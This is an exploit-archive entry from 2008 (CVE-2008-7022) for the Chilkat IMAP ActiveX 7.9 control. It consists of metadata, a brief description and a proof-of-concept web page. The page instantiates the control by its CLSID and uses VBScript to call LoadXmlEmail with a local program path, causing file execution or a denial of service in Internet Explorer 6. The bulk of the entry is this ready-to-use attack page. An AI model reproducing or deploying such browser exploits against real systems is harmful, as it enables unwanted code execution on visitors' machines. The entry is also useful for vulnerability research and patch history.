Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service
Author: e.wiZz!
type: remote
platform: windows
port:
date_added: 2008-09-26
date_updated:
verified: 1
codes: OSVDB-57328;CVE-2008-7022
tags:
aliases:
screenshot_url:
application_url:
##################Chilkat IMAP ActiveX File Execution&IE DoS ################
www.chilkasoft.com
####By: e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum
In the wild...
#####################################################################################
File: ChilkatMail_v7_9.dll
ProgID: ChilkatMail2.ChilkatMailMan2.1
CLSID: 126FB030-1E9E-4517-A254-430616582C50
Description:
Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE.
Tested on IE 6,Win xp sp2
#####################################################################################
<object classid='clsid:126FB030-1E9E-4517-A254-430616582C50' id='inthewild' />
<script language='vbscript'>
targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat IMAP ActiveX\ChilkatMail_v7_9.dll"
prototype = "Function LoadXmlEmail ( ByVal emailFilename As String ) As IChilkatEmail2"
memberName = "LoadXmlEmail"
progid = "CHILKATMAILLib2.ChilkatMailMan2"
argCount = 1
arg1="C:\Program Files\mIRC\mirc.exe"
inthewild.LoadXmlEmail arg1
</script>
# milw0rm.com [2008-09-27]